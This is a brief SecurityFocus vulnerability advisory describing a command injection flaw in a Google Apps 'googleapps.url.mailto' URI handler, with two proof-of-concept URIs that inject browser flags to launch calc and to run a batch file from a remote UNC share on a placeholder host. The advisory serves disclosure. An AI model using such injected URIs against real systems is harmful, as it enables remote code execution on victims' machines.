Google Apps 'googleapps.url.mailto' Handler Command Injection Vulnerability

The following example URIs are available:

googleapps.url.mailto://"%20--domain="--what%20--renderer-path=calc%20--no-sandbox%20--x"/

googleapps.url.mailto://"%20--domain="--x%20--renderer-path=\\www.example.com\uncshare\sh.bat%20--no-sandbox%20--x"/


 

Privacy Statement
Copyright 2010, SecurityFocus